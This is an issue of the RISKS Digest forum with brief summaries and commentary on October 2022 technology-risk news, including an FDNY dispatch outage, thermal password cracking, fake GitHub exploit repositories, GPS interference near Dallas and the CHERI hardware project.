Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…
Aristos Georgiou, *Newsweek*, 19 0ct 2022, via ACM TechNews, 24 Oct 2022 A computer scientist created a nuclear war simulator to demonstrate atomic weapons' destructive potential to the public. Christopher Minson said Russia's war in Ukraine has elevated traffic to his website, which hosts a map tool for modeling an attack on the U.S. involving approximately 1,200 nuclear warheads. Minson based the tool on databases of warhead yields and targets derived from declassified information; he then compiled a database of census data, and mapped populations to target sites. Minson said the system correlates this data and executes a two-hour attack, calculating casualties from known impact and population size, and modeling the spread of fallout. "It is critical that the public understands this threat," he said. "They need to see, clearly and viscerally, just how universal and destructive a nuclear war would be." https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f78bx23708fx072432&
Jacklin Kwan, *Science*, 11 Oct 2022, via ACM TechNews, 12 Oct 2022 Climate change is jeopardizing the operation of high-performance computing (HPC) facilities. Natalie Bates at the U.S. Department of Energy's Lawrence Livermore National Laboratory (LLNL) said such facilities, which include supercomputers and data centers, are vulnerable due to their high cooling demands and massive energy use. Increased humidity driven by climate change can reduce the efficiency of the evaporative coolers many HPC centers depend on, and also can threaten the systems with blowouts. Hewlett Packard Enterprise's Nicolas Dub=C8 said the high cost of upgrades to adapt to such changes has driven some HPC centers to cooler and drier locations like Canada and Finland. LLNL's Anna-Maria Bailey said the cost of relocation may be unaffordable, so the California facility is considering moving its computers underground. https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f638x236c48x071990&
https://www.bbc.com/future/article/20221011-how-space-weather-causes-computer-errors "When computers go wrong, we tend to assume it's just some software hiccup, a bit of bad programming. But ionising radiation, including rays of protons blasted towards us by the sun, can also be the cause. These incidents, called single-event upsets, are rare and it can be impossible to be sure that cosmic rays were involved in a specific malfunction because they leave no trace behind them." As silicon features reduce to near atomic dimensions (approaching 1 nanometer == 10), these events are likely increase their frequency. The biggest supercomputers contain very high-density physical memory pools. Administrators and reliability engineers battle with row-level memory failures constantly. See https://catless.ncl.ac.uk/Risks/30/15#subj6.1. There are at least 10 prior comp.risks posts containing the term "cosmic ray."
In NYC, the "911" calls come into a central "public safety answering
position" ("psap"). If the emergency required EMS or fire response, it's
transferred to the fire dep't center and then dispatched from there.
The FDNY dispatch and control system was crippled for half a day earlier
this week because...
... a contractor, thinking he was pushing an "open the door, Hal", button,
lifted the cover on a button labeled "EPO"...
Which stood for... "emergency power off".
Ok, everyone, start cringing... Including asking why, in addition to not
having a secondary "hot standby" system, it took *hours* to bring this back
up.
[NY Post]
Oops! FDNY contractor presses wrong button, shuts down NYC's emergency
dispatch system
An outside contractor making repairs at the FDNY's emergency dispatch
center in downtown Brooklyn pressed the wrong button to open a door—and
shut down the agency's communications system, triggering an hours-long
citywide crisis.
Wednesday's snafu at the FDNY's MetroTech Center facility forced staffers
to rely on ancient methods - pens, paper and telephones rather than
digital systems—to gather facts and get word to first responders as 911
calls came in, officials for unions representing the agency's dispatchers
and medics told The Post.
Delays responding to emergency calls ranged from a few minutes to more
than an hour, said Oren Barzilay, president of Local 2507, which
represents city EMTs and paramedics. [...]
The shutdown occurred around 11 a.m. when a repairman from communications
company Lightpath responded to a report of an earlier glitch at the data
center. [...]
The repairman mistook a glass-enclosed button, marked "EPO" for "emergency
power off," for an electronic door release button, so he opened the lid and
accidentally shut down the system, workers recalled. [...[
The agency's radio systems were down until 2:30 p.m., and mobile data
terminals out in the field weren't fully operational until 6 p.m., Smyth
and Barzilay said.
https://nypost.com/2022/10/15/fdny-contractor-presses-wrong-button-shuts-down-emergency-dispatch-system/
Jessica Hallman, Penn State News, 13 Oct 2022, via ACM TechNews, 19 Oct 2022 Pennsylvania State University (Penn State) researchers found that natural language processing models often are biased against people with disabilities. The researchers studied 13 popular machine learning models trained to generate sequences of words, and tested over 15,000 unique sentences on each model to produce word associations for over 600 adjectives that could be associated with individuals with or without disabilities. The researchers assessed the sentiment of each adjective generated as positive, negative, or neutral, finding that sentences with disability-related words scored more negatively than sentences lacking them. Penn State's Pranav Venkit said the work demonstrates "that people need to care about what sort of models they are using and what the repercussions are that could affect real people in their everyday lives." https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f706x236eaex072403&
https://phys.org/news/2022-10-ai-accurately-human-response-drug.html "The journey between identifying a potential therapeutic compound and Food and Drug Administration approval of a new drug can take well over a decade and cost upward of a billion dollars. A research team at the CUNY Graduate Center has created an artificial intelligence model that could significantly improve the accuracy and reduce the time and cost of the drug development process." The AI yields a number that supposedly determines the outcome from swallowing a pill or undergoing IV infusion. Reduce pharmaceutical company operating and R&D expenses for drug approval: substitute machine decisions for double-blind random control trials and other FDA-mandated processes. Regulatory processes safeguard public health and safety. [Heuristic, perhaps nondeterministic, no need for testing, expensive controlled trials, long delays, and regulation, what could possibly go wrong? PGN]
Zeynep Tufekci, The New York Times, 16 Oct 2022 We Should Try to Prevent Another Alex Jones https://www.nytimes.com/2022/10/16/opinion/alex-jones-sandy-hook.html PGN notes: Zeynep comments on her own article: On the Alex Jones Verdict: The Very, Very Lucrative World of Lying https://www.theinsight.org/p/on-the-alex-jones-verdict-the-very My latest piece for *The New York Times* returns to a key question: how should we grapple with the current historic transformation of the public sphere? I focus on the Alex Jones trial and verdict, but my question is about the future: what can we do, what should we do, to prevent future cases? I suggest that we take a closer look at money as an incentive, and also focus on friction as an answer. [...] ZT
Starting to see articles pushing for the creation of an alternative to Twitter for people who aren't horrible. Not a new idea. Let's see if anyone with money puts it where their mouths are. Not holding my breath. -L
It would be prudent for @Twitter users *right now* to start planning how they would deal with a return of mass hate speech and disinformation to TWitter, and how they will hold @Twitter, @Apple, @Google and other related ecosystem stakeholders responsible. -L
So apparently @Twitter has a problem with retaining "power users". Could be. ProTip: Flooding Twitter with hate speech and disinformation a la Musk's Twitter isn't likely to help those retention metrics at all. Quite the opposite. And creating a firestorm of negative media and regulator (e.g., EU) attention by embracing hate speech and disinformation isn't gonna help the business stuff either. All the oxygen will be sucked out of the room. -L
https://www.globalwitness.org/en/campaigns/digital-threats/tiktok-and-facebook-f ail-detect-election-disinformation-us-while-youtube-succeeds/
https://www.thebureauinvestigates.com/stories/2022-10-20/behind-tiktoks-boom-a-legion-of-traumatised-10-a-day-content-moderators
Association for Computing Machinery, 13 Oct 2022,
via ACM TechNews, October 14, 2022
Despite their efficiency in confirming the accuracy of election results,
risk-limiting audits (RLAs) are underused, according to a new TechBrief from
ACM's global Technology Policy Council. The authors found only five
U.S. states will require then in the upcoming November elections, while just
10 additional states either have RLA pilot programs or allow their
use. Meanwhile, Denmark is the only other country to have performed an RLA
of an election. "RLAs give us the best of both worlds: a high degree of
accuracy and transparency without the enormous undertaking that is counting
every contest on every ballot by hand," said TechBrief co-lead author
Matthew Bernhard.
https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f684x236d1fx072707&
[Risks? If you don't believe in science and technology, you most
likely won't believe in RLAs. See the CACM Inside Risks article:
Rebecca T. Mercuri and Peter G. Neumann,
The Risks of Election Believability (or Lack Thereof),
CACM June 2021:
http://www.csl.sri.com/neumann/cacm251.pdf
What can be done to get more people understanding science and tech?
PGN]
Emennet Pasargad, the Iranian cyberthreat actors behind an attempt to disrupt the U.S. presidential election in 2020, remain active, warns the FBI. https://www.govinfosecurity.com/iran-hackers-behind-attempt-on-us-election-are-still-active-a-20310 www.govinfosecurity.com
I recently stayed in a brand new hotel in the Bay Area, and it had a *Bluetooth Mirror* in the bathroom. For the life of me, I can't imagine what geek's bright idea this Bluetooth-enabled mirror was, but it's right up there with 'smart rocks' (wifi-enabled boulders???). The *misuses* of this idea far exceed the *uses*, by many orders of magnitude. [NOT] Attached is a screenshot of my phone after pairing with this dumbest of all ideas. The mirror apparently has the same SW as a BT boombox, so you can call your phone on the throne? [Hone alone?] Notice that I didn't allow this mirror to access my *contacts*, but if I had, it would have downloaded all 2000+ of them, I presume. I don't think that this mirror had a camera, but in today's world, I wouldn't be too sure. [I understand that some hotel rooms now come complete with either Amazon's *Alexa* or Google's *OK Google*, so you're now under 24x7 surveillance.]
Here's everything Amazon learns about your family, your home and you. https://www.washingtonpost.com/technology/interactive/2022/amazon-smart-home Toilet, garage, car, doorbell, Roomba, TV, lights/switches/shades, exercise band, router, soap dispenser (!), medicines, pantry, Whole Foods, air quality, thermostat, more.
Episode lasting almost 2 days prompted the closure of a runway at Dallas airport. The Federal Aviation Administration is investigating the cause of mysterious GPS interference that, over the past few days, has closed one runway at the Dallas-Fort Worth International Airport and prompted some aircraft in the region to be rerouted to areas where signals were working properly. The interference first came to light on Monday afternoon when the FAA issued an advisory over ATIS (Automatic Terminal Information Service). It warned flight personnel and air traffic controllers of GPS interference over a 40-mile swath of airspace near the Dallas-Fort Worth airport. The advisory read in part: ATTN ALL AIRCRAFT. GPS REPORTED UNRELIABLE WITHIN 40 NM OF DFW. [...] https://arstechnica.com/information-technology/2022/10/cause-is-unknown-for-mysterious-gps-outage-that-rerouted-texas-air-traffic/ "This week's event appears similar to one that, according to GPSWorld, played out in Denver last January. In the January episode, aircraft in a 50-nautical-mile swath of airspace around the airport reported unreliable GPS for more than 33 hours." https://www.gpsworld.com/what-happened-to-gps-in-denver/
A Cuban pilot defected to Florida on Friday but there won't be much intelligence to be gleaned from the government aircraft he stole. The pilot, identified by a Spanish publication as Ruben Martinez, flew an ancient Antonov An-2 single-engine biplane at wavetop level before landing at Dade-Collier Training and Transition Airport in the Everglades. The TSA and Customs and Border Protection are, of course, interested in how the school-bus sized relic of the Soviet era was able to sneak through one of the most surveilled coastlines in the country. https://www.avweb.com/aviation-news/cuban-defector-flies-stolen-an-2-to-florida/
There appears to be a significant flaw in the Google Chat notification model that can easily cause desktop users to be unaware of important chat replies for hours, days—or indefinitely. It happened to me. These notification issues may relate to the hangouts->chat migration. On (linux) desktops, there's no longer a native official Google Chat app, so if Chrome isn't running there are apparently no related desktop notifications. The desktop notification that Chrome throws when running (even when not showing Gmail) is momentary, if you're not around at the moment it pops you won't see or hear it.
Releasing one of these Parabon images to the public like the Edmonton Police did recently, is dangerous and irresponsible, especially when that image implicates a Black person and an immigrant. On Tuesday, the Edmonton Police Service (EPS) shared a computer generated image of a suspect <https://www.edmontonpolice.ca/News/MediaReleases/DNAPhenotypeOct4> they created with DNA phenotyping, which it used for the first time in hopes of identifying a suspect from a 2019 sexual assault case. Using DNA evidence from the case, a company called Parabon NanoLabs created the image of a young Black man. The composite image did not factor in the suspect's age, BMI, or environmental factors, such as facial hair, tattoos, and scars. The EPS then released this image to the public, both on its website and on social media platforms including its Twitter, claiming it to be “a last resort after all investigative avenues have been exhausted.'' The EPS's decision to produce and share this image is extremely harmful, according to privacy experts, raising questions about the racial biases in DNA phenotyping for forensic investigations and the privacy violations of DNA databases that investigators are able to search through. In response to the EPS's tweet of the image, many privacy and criminal justice experts replied with indignation at the irresponsibility of the police department. Callie Schroeder, the Global Privacy Counsel at the Electronic Privacy Information Center, retweeted the tweet, questioning the usefulness of the image: “Even if it is a new piece of information, what are you going to do with this? Question every approximately 5'4" black man you see? ...that is not a suggestion, absolutely do not do that.'' [...] https://www.vice.com/en/article/pkgma8/police-are-using-dna-to-generate-3d-images-of-suspects-theyve-never-seen
They were supposed to be the future. But prominent detractors—including Anthony Levandowski, who pioneered the industry—are getting louder as the losses get bigger. https://www.bloomberg.com/news/features/2022-10-06/even-after-100-billion-self-driving-cars-are-going-nowhere
Eleven people were killed in U.S. crashes involving vehicles that were using automated driving systems during a four-month period earlier this year, according to newly released government data, part of an alarming pattern of incidents linked to the technology. https://www.autosafety.org/11-more-crash-deaths-are-linked-to-automated-tech-vehicles 11 people in four months? Out of how many total killed on roads in that time? More meaningful would be deaths/miles driven with and without automated technologies.
https://www.wired.com/story/high-tech-cars-killing-the-traditional-auto-repair-shop/
[PGN Note: This reminds me of the wonderful old Alex Guiness film:
The Man in The White Suit, 1951
Sidney ("Sid") Stratton, a brilliant young research chemist and former
Cambridge scholarship recipient, has been dismissed from jobs at several
textile mills in the north of England because of his demands for expensive
facilities and his obsession with inventing an everlasting fibre. Whilst
working as a labourer at the Birnley Mills, he accidentally becomes an
unpaid researcher and invents an incredibly strong fibre which repels dirt
and never wears out. From this fabric, a suit is made-which is brilliant
white because it cannot absorb dye and slightly luminous because it
includes radioactive elements.
Stratton is lauded as a genius until both management and the trade unions
realise the consequence of his invention; once consumers have purchased
enough cloth, demand will drop precipitously and put the textile industry
out of business. The managers try to trick and bribe Stratton into signing
away the rights to his invention but he refuses. Managers and workers each
try to shut him away, but he escapes. Wikipedia]
[Perhaps fortunately for the mechanics, self-driving cars are still a
long way from trustworthy. The diagnostic tools are good enough that
they can quickly identify which chip to replace, the tools are
presumably proprietary so it is more difficult for you to do your own
maintenance, and mechanics can probably charge you large rates for
maintenance even though it becomes trivial to change the part.
Furthermore, there still seems to be business for mechanics and body
shops (legal or otherwise), from accidents. Also, in that California's
Governor Newsom has made it illegal in California to buy a
stolen/stripped catalyic convertor, that has apparently not stopped the
thieves and the blackmarket for precious metals. PGN]
Heat-detecting cameras can help crack passwords up to a minute after typing them, researchers have found, as they warn similar systems could be developed by criminals to break into computers and smartphones. Heat from people's fingertips can be detected on recently-used keyboards and, when thermal images were combined with the help of artificial intelligence, informed guesses of what the password could be were made by a tool developed by researchers at the University of Glasgow. Some 86% of passwords were cracked when thermal images were taken within 20 seconds of typing in the secret code and put through their ThermoSecure system, and 76% when within 30 seconds. Success dropped to 62% after 60 seconds of entry. They also found within 20 seconds, the system was capable of successfully attacking even long passwords of 16 characters, with a rate of up to 67% correct attempts. It's important that computer security research keeps pace with these developments to find new ways to mitigate risk, and we will continue to develop our technology to try to stay one step ahead of attackers. [...] https://news.yahoo.com/heat-fingertips-used-crack-passwords-102357016.html
Q: What's wrong with these Cambridge, MA, listings? https://www.zillow.com/homedetails/21-Day-St-Cambridge-MA-02140/2061016351_zpid/ https://www.zillow.com/homedetails/3-Jarvis-St-Cambridge-MA-02138/2061087683_zpid/ https://www.zillow.com/homedetails/6607-Bellis-Ct-Cambridge-MA-02140/2061083868_zpid/ https://www.zillow.com/homedetails/56-Scott-St-Cambridge-MA-02138/2061087954_zpid/ https://www.zillow.com/homedetails/14-Alpine-St-Cambridge-MA-02138/2061083680_zp id/ A: They're all really in Cambridge ON (Ontario), Canada. (In some cases, the street names are a bit off. Usually, "street" instead of "road", but "Bellis" is actually "Ellis".) I don't know what's gotten into Zillow, but they seem to have a problem!
The attacks showcase broader security concerns as phishing grows in volume and sophistication, especially given that Windows Defender's Safe Links feature for identifying malicious links in emails completely failed in the campaign. https://www.darkreading.com/attacks-breaches/real-estate-phish-1000s-credentials-escalating-cyber-risk
So @googlechrome is apparently dropping updates for Windows 7 early next year. From a purely logical standpoint for @Google this makes complete and utter sense. However, given the VERY high number of people still using Windows 7 for important applications, there's a real risk. -L
https://www.caranddriver.com/news/a41710516/driver-safety-abuse-semi-autonomous-technology-insurance-institute/ [But not if they have been reading RISKS? PGN]
Previously unreported details shed new light on Twitter's motivations for selling the company—and Elon Musk's plans to transform it. Twitter's workforce is likely to be hit with massive cuts in the coming months, no matter who owns the company, interviews and documents obtained by *The Washington Post* show, a change likely to have major impact on its ability to control harmful content and prevent data security crises. Elon Musk told prospective investors in his deal to buy the company that he planned to get rid of nearly 75 percent of Twitter's 7,500 workers, whittling the company down to a skeleton staff of just over 2,000.
https://www.washingtonpost.com/technology/2022/10/20/musk-twitter-acquisition-staff-cuts/
https://techxplore.com/news/2022-10-vulnerability-transformers-based-malware-detectors-adversarial.html Malware detection techniques are challenged by hackers, APTs, etc. who adjust payload signatures that avoid detection. The arms race continues.
Bill Toulas, *BleepingComputer*, 23 Oct 2022, via ACM TechNews, 24 Oct 2022 Researchers at the Leiden Institute of Advanced Computer Science in the Netherlands discovered thousands of GitHub repositories offering fake proof-of-concept (PoC) exploits for various vulnerabilities, including malware. The researchers analyzed slightly more than 47,300 repositories promoting exploits for vulnerabilities disclosed between 2017 and 2021 using Internet Protocol (IP) address analysis, binary analysis, and hexadecimal and Base64 analysis. Over 2,800 of 150,734 unique IPs extracted matched blocklist entries, 1,522 were labeled malicious in antivirus scans on Virus Total, and 1,069 of them were in the AbuseIPDB database. The researchers designated 4,893 of 47,313 tested repositories malicious, with most focusing on vulnerabilities from 2020. The researchers advised software testers to thoroughly vet the PoCs they download, and to run as many checks as possible before execution. https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f78bx237093x072432&
https://arstechnica.com/information-technology/2022/10/how-a-microsoft-blunder-opened-millions-of-pcs-to-potent-malware-attacks/ https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity#windows-security-app
Doing encryption well ain't easy. -L https://www.bleepingcomputer.com/news/security/microsoft-office-365-email-encryp tion-could-expose-message-content/
https://twitter.com/laurenweinstein/status/1581325271810027523 I have long advocated for FIDO U2F security keys as the preferred multiple factor authentication model, and have suggested explicitly that "passwords must die". So it's natural that I'm being asked about the @google "passkey" initiative. There are multiple aspects to this. An obvious one is how rapidly sites will implement this method. Given the glacial speed with which many financial institutions have implemented crude 2-factor like text messaging and have delayed U2F key implementations, I am not optimistic. Of even more concern is the sense that the methodology of passkeys will appeal mainly to the tech-savvy, and will be understandably resisted by many everyday users, who will find the model overly complex and difficult to trust for that reason. This presents a familiar dilemma: persons who already are careful with their authentication security will benefit but the users most in need of improved security and who are most vulnerable largely will not—especially if they don't use multiple devices and 24/7 smartphones. The upshot isn't that passkeys won't have a place—they will—but that I suspect they will not be accepted by a significant proportion of sites and users, keeping in mind that many people even refuse to use ordinary autofill, especially for passwords or payment methods. I have pointed out this problem with @google outreach to users many times over the years, and again, while there have been some improvements, many users are still being left behind, and that's very unfortunate indeed.
Fuller learned her rental application had been screened by RentGrow, one of more than a dozen companies that mine consumer databases to perform background checks on tenants. A form emailed to her said RentGrow determined she didn't meet applicant screening requirements, highlighting in yellow the box labeled *credit history*. The letter provided no further explanation. A RentGrow representative, through an executive at its parent company, declined to comment. Habitat America declined to respond to questions about Fuller's application from ProPublica, citing privacy concerns. You don't know why you got denied or if you were ever considered. It's really murky out there.
The toughest export restrictions yet cut off AI hardware and chip-making tools crucial to China's commercial and military ambitions. https://www.wired.com/story/us-chip-sanctions-kneecap-chinas-tech-industry
https://techxplore.com/news/2022-10-danger-advanced-artificial-intelligence-feed back.html "What we now call the reinforcement learning problem was first considered in 1933 by the pathologist William Thompson. He wondered: if I have two untested treatments and a population of patients, how should I assign treatments in succession to cure the most patients? "More generally, the reinforcement learning problem is about how to plan your actions to best accrue rewards over the long term. The hitch is that, to begin with, you're not sure how your actions affect rewards, but over time you can observe the dependence. For Thompson, an action was the selection of a treatment, and a reward corresponded to a patient being cured." Without human oversight, a generalized superintelligence might be a "no brainer" waiting to happen. Good script kiddie experiment.
https://techcrunch.com/2022/10/12/toyota-customer-email-addresses-exposed/
https://mashable.com/article/parler-leaks-vip-emails-kanye-west-ivanka-trump
Matthew Sparkes, *New Scientist*, 13 Oct 2022, via ACM TechNews, 17 Oct 2022 Jakob Moosbauer and Manuel Kauers at Austria's Johannes Kepler University Linz bested an algorithm developed by artificial intelligence company DeepMind with a program that can perform matrix multiplication more efficiently. Earlier this month, DeepMind unveiled a method for multiplying two five-by-five matrices in just 96 multiplications, out-performing a more-than-50-year-old record. Moosbauer and Kauers reduced the process to 95 multiplications by testing multiple steps in multiplication algorithms to see if they could be combined. Said Moosbauer, "We take an existing algorithm and apply a sequence of transformations that at some point can lead to an improvement. Our technique works for any known algorithm, and if we are lucky, then [the results] need one multiplication less than before." https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2f6b4x236dbax072760&
A group of RAND Corporation researchers found that machine-learning (ML) models can identify signs of deception during national security background check interviews. The most accurate approach for detecting deception is an ML model that counts the number of times that interviewees use common words. https://www.rand.org/pubs/research_briefs/RBA873-1.html [The? Er? Um? You-know? Well? PGN]
This suggests to me that a good strategy to confound the thermal detectors would be to use repeated characters in passwords. I doubt that the thermal detection would be able to tell how many times a key was pressed, rather than just the recency of a given key press. That would go against the common assumption that repeated characters in passwords are a Bad Thing.
Never mind! The airline reversed itself Wednesday, saying it had consulted with German aviation authorities, who agreed that Bluetooth trackers were safe for passengers to use. https://www.nytimes.com/2022/10/12/travel/lufthansa-apple-airtags-luggage.html
If you read the reasons they give, I wouldn't call it a DoS attack but rather yet another fragile supply chain. COVID caused a lot of mail that would have normally been sent by air to be sent by sea, and it appears that the places they inspect airmail are not the ones where they inspect sea mail, what with airports and seaports being different. It's like the Great Toilet Paper Shortage which turned out not to be that there wasn't enough, but that there are different kinds for homes and institutions. When everyone started staying home, it was not easy to repackage and redirect the institutional kind for home use.
Naturally, I would like more research into why so many cars are crashing into the chicane (a large, clearly marked, immobile structure): but this is not necessarily a bad thing. Crashing into a chicane is better than mowing down a child. The chicane is, presumably, better signposted and more visible than any small child, so any driver who crashed into the chicane is presumably a risk to children, not just in the road but also on the pavement: since the chicane hitter obviously has difficulty in keeping to the road! Perhaps it is just as well that they are taken out of action before they can do more serious harm?
I have long been interested in technology that might make computers more secure, and have been watching one such project for over a decade. CHERI, a combined software and hardware project, has now reached the implemented-in-silicon stage: https://www.arm.com/architecture/cpu/morello. I have written an article explaining the thinking behind CHERI and how Microsoft engineers using CHERI believe that they can eliminate as much two thirds of vulnerabilities in software that uses C or C++: https://www.usenix.org/publications/loginonline/redesigning-hardware-support-sec urity-cheri CHERI provides hardware support for limiting the range of pointers as well as support for mechanisms to prevent use-after-free bugs. CHERI provides scalable compartmentalization, meaning that operating systems themselves can be partitioned on memory boundaries without the performance expense of changing context or flushing page caches. Overall, CHERI is a project that may prove to be the most significant change in architecture in decades. [Rik Farrow is the Editor of ;login: PGN]
The White House has released its National Security Strategy report, The full report is at https://www.whitehouse.gov/wp-content/uploads/2022/10/Biden-Harris-Administrations-National-Security-Strategy-10.2022.pdf A summary is at https://www.whitehouse.gov/briefing-room/speeches-remarks/2022/10/13/remarks-by-national-security-advisor-jake-sullivan-on-the-biden-harris-administrations-national-security-strategy/
Christian Fuchs. 2023/. //Digital Ethics. Media, Communication and Society Volume Five//. /New York: Routledge. ISBN 9781032246161. More infos and sample chapter: https://fuchsc.uti.at/books/digital-ethics/ This fifth volume in Christian Fuchs, Media, Communication and Society series, presents an approach to critical digital ethics. It develops foundations and applications of digital ethics based on critical theory. It applies a critical approach to ethics within the realm of digital technology. Based on the notions of alienation, communication (in)justice, media (in)justice, and digital (in)justice, it analyses ethics in the context of digital labour and the surveillance-industrial complex; social media research ethics; privacy on Facebook; participation, co-operation, and sustainability in the information society; the digital commons; the digital public sphere; and digital democracy. The book consists of three arts. Part I presents some of the philosophical foundations of critical, humanist digital ethics. Part II applies these foundations to concrete digital ethics case studies. Part III presents broad conclusions about how to advance the digital commons, the digital public sphere, and digital democracy, which is the ultimate goal of critical digital ethics. [...]
Please report problems with the web pages to the maintainer